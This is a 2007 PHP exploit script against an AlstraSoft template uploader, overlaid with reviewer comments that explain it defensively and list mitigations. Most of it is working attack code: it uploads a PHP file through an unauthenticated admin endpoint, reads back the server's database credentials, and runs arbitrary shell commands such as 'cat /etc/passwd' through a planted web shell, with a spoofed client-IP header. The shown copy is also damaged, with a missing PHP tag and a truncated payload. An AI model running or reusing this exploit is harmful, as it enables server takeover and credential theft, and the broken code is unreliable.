#!/usr/bin/php -q -d short_open_tag=on Thanks to rgod for the php code and Marty for the Love ";
/*
 * Review notes (defensive reading of this file):
 * - 2007-era PoC for the AlstraSoft template uploader (see the author's VULN EXPLANATION
 *   below). It sends one multipart POST to admin/addsptemplate.php, then GETs under
 *   spusers/ and sptemplates/, reading each response into the global $html.
 * - The copy on this page is damaged: the banner echo's opening quote and the PHP open tag
 *   that `-d short_open_tag=on` implies are not present, so the file as shown is not
 *   syntactically valid on its own.
 * - eregi() (used in sendpacketii) was removed in PHP 7.0; the proxy branch cannot run on a
 *   modern interpreter, and error_reporting(0) below would hide that failure.
 */
if ($argc<4) {
echo "Usage: php ".$argv[0]." Host Path CMD Host: target server (ip/hostname) Path: path of template CMD: A Shell Command Example: php ".$argv[0]." localhost /template/ cat /etc/passwd";
die;
}
// Suppress all diagnostics and run without a time limit; socket connects time out after 5s.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
/* ___________________________________________________________________ / This script is part of the AlstraSoft Exploit Pack: \ | | | http://itablackhawk.altervista.org/exploit/alsoft_exploit_pack; | | | | You can find the patches for this bugs at: | | | | http://itablackhawk.altervista.org/download/alsoft_patch.zip | | | \________________________.:BlackHawk 2007:._________________________/ */
/* VULN EXPLANATION Same problem of Vuln N.1 but with this we can upload PHP files.. The Vulnerable script can be found in admin/addsptemplate.php */

/*
 * quick_dump: hex + printable-ASCII dump of $string, 15 bytes per row (bytes <= 0x20 or
 * > 0x7e are shown as "."). Returns the hex rows, a CRLF, then the ASCII rows.
 * Defined but never called anywhere in this script.
 * NOTE(review): `|` below is a bitwise OR applied to two booleans; it only behaves because
 * PHP casts them to ints. `||` is what is meant.
 */
function quick_dump($string)
{
    $result='';$exa='';$cont=0;
    for ($i=0; $i<=strlen($string)-1; $i++) {
        if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";}
        else {$result.=" ".$string[$i];}
        // Left-pad single hex digits so every byte occupies two columns.
        if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));}
        else {$exa.=" 0".dechex(ord($string[$i]));}
        $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
    }
    return $exa."\r\n".$result;
}

// Matches an "a.b.c.d:port" proxy spec; sendpacketii() uses it to validate $proxy.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

/*
 * sendpacketii: writes one raw HTTP request ($packet) to $host:$port, or to $proxy
 * ("ip:port") when it is non-empty, and leaves the entire response in the global $html.
 * Direct connections are read with fgets() until EOF; the proxy path reads one byte at a
 * time until EOF has been reached and a CRLFCRLF has been seen (via eregi(), which no
 * longer exists in PHP >= 7.0). Any connection failure prints a message and die()s, so
 * callers never receive an error return value.
 */
function sendpacketii($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy=='') {
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
            echo 'No response from '.$host.':'.$port; die;
        }
    }
    else {
        $c = preg_match($proxy_regex,$proxy);
        if (!$c) {
            echo 'Not a valid proxy...';die;
        }
        $parts=explode(':',$proxy);
        echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) {
            echo 'No response from proxy...';die;
        }
    }
    fputs($ock,$packet);
    if ($proxy=='') {
        $html='';
        while (!feof($ock)) {
            $html.=fgets($ock);
        }
    }
    else {
        $html='';
        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
            $html.=fread($ock,1);
        }
    }
    fclose($ock);
}

// ---- main: argument handling ----
$host=$argv[1];
$path=$argv[2];
$cmd="";
// Everything after the path is joined into a single command string.
for ($i=3; $i<=$argc-1; $i++){
    $cmd.=" ".$argv[$i];
}
$port=80;
$proxy="";
// $port and $proxy are hard-coded, so the proxy branch in sendpacketii() is dead in this build.
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
// Request-line target: path only for direct connections, absolute URL when going through a proxy.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "- Uploading Shell Creator..\r\n";
// A minimal JPEG (SOI, APP0, APP1/Exif, two DQT, SOF0, four DHT, SOS, EOI markers) sent as
// the "fpi" image part. The regex further down expects the server to derive a
// thumb_daforno_imperat.jpeg thumbnail from it.
$italy_rulez= chr(0xff).chr(0xd8).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).
chr(0x00).chr(0x60).chr(0x00).chr(0x60).chr(0x00).chr(0x00).chr(0xff).
chr(0xe1).chr(0x00).chr(0x36).chr(0x45).chr(0x78).chr(0x69).chr(0x66).
chr(0x00).chr(0x00).chr(0x49).chr(0x49).chr(0x2a).chr(0x00).chr(0x08).
chr(0x00).chr(0x00).chr(0x00).chr(0x02).chr(0x00).chr(0x01).chr(0x03).
chr(0x05).chr(0x00).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x26).
chr(0x00).chr(0x00).chr(0x00).chr(0x03).chr(0x03).chr(0x01).chr(0x00).
chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x14).chr(0xc6).
chr(0xff).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xa0).chr(0x86).
chr(0x01).chr(0x00).chr(0x8f).chr(0xb1).chr(0x00).chr(0x00).chr(0xff).
chr(0xdb).chr(0x00).chr(0x43).chr(0x00).chr(0x08).chr(0x06).chr(0x06).
chr(0x07).chr(0x06).chr(0x05).chr(0x08).chr(0x07).chr(0x07).chr(0x07).
chr(0x09).chr(0x09).chr(0x08).chr(0x0a).chr(0x0c).chr(0x14).chr(0x0d).
chr(0x0c).chr(0x0b).chr(0x0b).chr(0x0c).chr(0x19).chr(0x12).chr(0x13).
chr(0x0f).chr(0x14).chr(0x1d).chr(0x1a).chr(0x1f).chr(0x1e).chr(0x1d).
chr(0x1a).chr(0x1c).chr(0x1c).chr(0x20).chr(0x24).chr(0x2e).chr(0x27).
chr(0x20).chr(0x22).chr(0x2c).chr(0x23).chr(0x1c).chr(0x1c).chr(0x28).
chr(0x37).chr(0x29).chr(0x2c).chr(0x30).chr(0x31).chr(0x34).chr(0x34).
chr(0x34).chr(0x1f).chr(0x27).chr(0x39).chr(0x3d).chr(0x38).chr(0x32).
chr(0x3c).chr(0x2e).chr(0x33).chr(0x34).chr(0x32).chr(0xff).chr(0xdb).
chr(0x00).chr(0x43).chr(0x01).chr(0x09).chr(0x09).chr(0x09).chr(0x0c).
chr(0x0b).chr(0x0c).chr(0x18).chr(0x0d).chr(0x0d).chr(0x18).chr(0x32).
chr(0x21).chr(0x1c).chr(0x21).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0xff).chr(0xc0).chr(0x00).
chr(0x11).chr(0x08).chr(0x00).chr(0x14).chr(0x00).chr(0x1e).chr(0x03).
chr(0x01).chr(0x22).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x00).
chr(0x00).chr(0x01).chr(0x05).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).
chr(0x05).chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).
chr(0xff).chr(0xc4).chr(0x00).chr(0xb5).chr(0x10).chr(0x00).chr(0x02).
chr(0x01).chr(0x03).chr(0x03).chr(0x02).chr(0x04).chr(0x03).chr(0x05).
chr(0x05).chr(0x04).chr(0x04).chr(0x00).chr(0x00).chr(0x01).chr(0x7d).
chr(0x01).chr(0x02).chr(0x03).chr(0x00).chr(0x04).chr(0x11).chr(0x05).
chr(0x12).chr(0x21).chr(0x31).chr(0x41).chr(0x06).chr(0x13).chr(0x51).
chr(0x61).chr(0x07).chr(0x22).chr(0x71).chr(0x14).chr(0x32).chr(0x81).
chr(0x91).chr(0xa1).chr(0x08).chr(0x23).chr(0x42).chr(0xb1).chr(0xc1).
chr(0x15).chr(0x52).chr(0xd1).chr(0xf0).chr(0x24).chr(0x33).chr(0x62).
chr(0x72).chr(0x82).chr(0x09).chr(0x0a).chr(0x16).chr(0x17).chr(0x18).
chr(0x19).chr(0x1a).chr(0x25).chr(0x26).chr(0x27).chr(0x28).chr(0x29).
chr(0x2a).chr(0x34).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).
chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48).
chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57).
chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66).
chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75).
chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x83).chr(0x84).
chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).chr(0x92).
chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).chr(0x99).
chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).chr(0xa7).
chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).chr(0xb5).
chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).chr(0xc3).
chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).chr(0xca).
chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).chr(0xd8).
chr(0xd9).chr(0xda).chr(0xe1).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5).
chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf1).chr(0xf2).
chr(0xf3).chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).
chr(0xfa).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x01).chr(0x00).
chr(0x03).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).chr(0x05).
chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).chr(0xff).
chr(0xc4).chr(0x00).chr(0xb5).chr(0x11).chr(0x00).chr(0x02).chr(0x01).
chr(0x02).chr(0x04).chr(0x04).chr(0x03).chr(0x04).chr(0x07).chr(0x05).
chr(0x04).chr(0x04).chr(0x00).chr(0x01).chr(0x02).chr(0x77).chr(0x00).
chr(0x01).chr(0x02).chr(0x03).chr(0x11).chr(0x04).chr(0x05).chr(0x21).
chr(0x31).chr(0x06).chr(0x12).chr(0x41).chr(0x51).chr(0x07).chr(0x61).
chr(0x71).chr(0x13).chr(0x22).chr(0x32).chr(0x81).chr(0x08).chr(0x14).
chr(0x42).chr(0x91).chr(0xa1).chr(0xb1).chr(0xc1).chr(0x09).chr(0x23).
chr(0x33).chr(0x52).chr(0xf0).chr(0x15).chr(0x62).chr(0x72).chr(0xd1).
chr(0x0a).chr(0x16).chr(0x24).chr(0x34).chr(0xe1).chr(0x25).chr(0xf1).
chr(0x17).chr(0x18).chr(0x19).chr(0x1a).chr(0x26).chr(0x27).chr(0x28).
chr(0x29).chr(0x2a).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).
chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48).
chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57).
chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66).
chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75).
chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x82).chr(0x83).
chr(0x84).chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).
chr(0x92).chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).
chr(0x99).chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).
chr(0xa7).chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).
chr(0xb5).chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).
chr(0xc3).chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).
chr(0xca).chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).
chr(0xd8).chr(0xd9).chr(0xda).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5).
chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf2).chr(0xf3).
chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).chr(0xfa).
chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01).chr(0x00).
chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00).
chr(0xd6).chr(0xaf).chr(0x4f).chr(0xf0).chr(0x97).chr(0xfc).chr(0x8b).
chr(0x16).chr(0x7f).chr(0xf0).chr(0x3f).chr(0xfd).chr(0x0d).chr(0xab).
chr(0xcc).chr(0x2b).chr(0xd3).chr(0xfc).chr(0x25).chr(0xff).chr(0x00).
chr(0x22).chr(0xc5).chr(0x9f).chr(0xfc).chr(0x0f).chr(0xff).chr(0x00).
chr(0x43).chr(0x6a).chr(0xf9).chr(0x0c).chr(0x83).chr(0xfd).chr(0xe6).
chr(0x5f).chr(0xe1).chr(0x7f).chr(0x9a).chr(0x3e).chr(0x13).chr(0x85).
chr(0xff).chr(0x00).chr(0xdf).chr(0x25).chr(0xfe).chr(0x17).chr(0xf9).
chr(0xa3).chr(0x80).chr(0xf8).chr(0xd9).chr(0xff).chr(0x00).chr(0x30).
chr(0x3f).chr(0xfb).chr(0x78).chr(0xff).chr(0x00).chr(0xda).chr(0x75).
chr(0xe4).chr(0xb5).chr(0xeb).chr(0x5f).chr(0x1b).chr(0x3f).chr(0xe6).
chr(0x07).chr(0xff).chr(0x00).chr(0x6f).chr(0x1f).chr(0xfb).chr(0x4e).
chr(0xbc).chr(0x96).chr(0xbd).chr(0x2c).chr(0x67).chr(0xf1).chr(0xe5).
chr(0xf2).chr(0xfc).chr(0x8f).chr(0xe9).chr(0x0e).chr(0x1b).chr(0xff).
chr(0x00).chr(0x91).chr(0x5d).chr(0x2f).chr(0xfb).chr(0x7b).chr(0xff).
chr(0x00).chr(0x4a).chr(0x67).chr(0xa5).chr(0x57).chr(0xa7).chr(0xf8).
chr(0x4b).chr(0xfe).chr(0x45).chr(0x8b).chr(0x3f).chr(0xf8).chr(0x1f).
chr(0xfe).chr(0x86).chr(0xd4).chr(0x51).chr(0x5e).chr(0x6e).chr(0x41).
chr(0xfe).chr(0xf3).chr(0x2f).chr(0xf0).chr(0xbf).chr(0xcd).chr(0x1f).
chr(0xcd).chr(0xfc).chr(0x2f).chr(0xfe).chr(0xf9).chr(0x2f).chr(0xf0).
chr(0xbf).chr(0xcd).chr(0x1c).chr(0x07).chr(0xc6).chr(0xcf).chr(0xf9).
chr(0x81).chr(0xff).chr(0x00).chr(0xdb).chr(0xc7).chr(0xfe).chr(0xd3).
chr(0xaf).chr(0x25).chr(0xa2).chr(0x8a).chr(0xf4).chr(0xb1).chr(0x9f).
chr(0xc7).chr(0x97).chr(0xcb).chr(0xf2).chr(0x3f).chr(0xa4).chr(0x38).
chr(0x6f).chr(0xfe).chr(0x45).chr(0x74).chr(0xbf).chr(0xed).chr(0xef).
chr(0xfd).chr(0x29).chr(0x9f).chr(0xff).chr(0xd9);
// Multipart body. Detection signals visible here: a part named "zip" whose filename ends in
// .php and carries an empty Content-Type, alongside a real image part named "fpi".
// Server-side mitigations: allowlist upload extensions and MIME types, store uploads outside
// the document root (or where PHP execution is disabled), and require an authenticated admin
// session for anything under admin/ (this request carries no cookie or credential).
$data="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"zip\"; filename=\"piggy_marty_creator.php\"\r\n";
$data.="Content-Type:\r\n\r\n";
// NOTE(review): this string begins mid-statement (`');`), so the first part of the uploaded
// file is missing from this copy of the page.
$data.="'); fclose(\$fp); chmod('piggy_marty.php',777); include '../../include/common.php'; echo 'delimitator'.\$db_server.'|'.\$db_user.'|'.\$db_password.'|'.\$db_database; ?>\r\n";
$data.='-----------------------------7d529a1d23092a Content-Disposition: form-data; name="addsubmit" 1 -----------------------------7d529a1d23092a Content-Disposition: form-data; name="type" 2 -----------------------------7d529a1d23092a Content-Disposition: form-data; name="category" Exploit And Similar -----------------------------7d529a1d23092a Content-Disposition: form-data; name="sdes" 4 -----------------------------7d529a1d23092a Content-Disposition: form-data; name="fpi"; filename="daforno_imperat.jpeg"; Content-Type: image/pjpeg '.$italy_rulez.' -----------------------------7d529a1d23092a-- ';
// Request 1: the upload POST.
$packet="POST ".$p."admin/addsptemplate.php HTTP/1.0\r\n";
// Client-supplied source-IP headers like this one must never feed server logs or ACLs;
// applications should record the socket peer address instead.
$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/example.html\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "- Retrieving correct Path where the shell is located..\r\n";
// Request 2: list templates so the server-generated directory name can be read back.
$packet ="GET ".$p."spusers/browse.php?browse=yes&show=all HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
// NOTE(review): the multipart $data is appended to this GET (and to the two GETs below)
// with no Content-Length header; it reads as a copy-paste leftover from the POST above.
$packet.=$data;
sendpacketii($packet);
// The directory is recovered from the thumbnail path the server produced for the "fpi" image.
if (preg_match("#/sptemplates/(.*?)/thumb_daforno_imperat.jpeg#is", $html, $oki)) {
    echo "- Creating the Shell & getting server credentials..\r\n";
    // Request 3: fetch the uploaded file; the response is split on the 'delimitator' marker
    // and the fields after it are printed as MySQL connection details.
    $packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty_creator.php HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);
    sleep(3);
    $temp=explode('delimitator',$html);
    list($myserver,$myusername,$mypassword,$mydbname)=explode('|',$temp[1]);
    echo " --- INFO FROM COMMON.PHP --- MySQL Server: $myserver MySQL Username: $myusername MySQL Password: $mypassword MySQL Database: $mydbname --- END INFO --- ";
    echo "Step 5 - Execute Commands exist..\r\n";
    // Request 4: the response is split on the "666999" marker and the text after it is printed.
    $packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);
    if (strstr($html,"666999")) {
        echo "Exploit succeeded...\r\n";
        $temp=explode("666999",$html);
        die("\r\n".$temp[1]."\r\n");
    }
}
else {
    die ('Error: Can\'t retrieve Shell Path');
}
# Coded With BH Fast Generator v0.1 ?>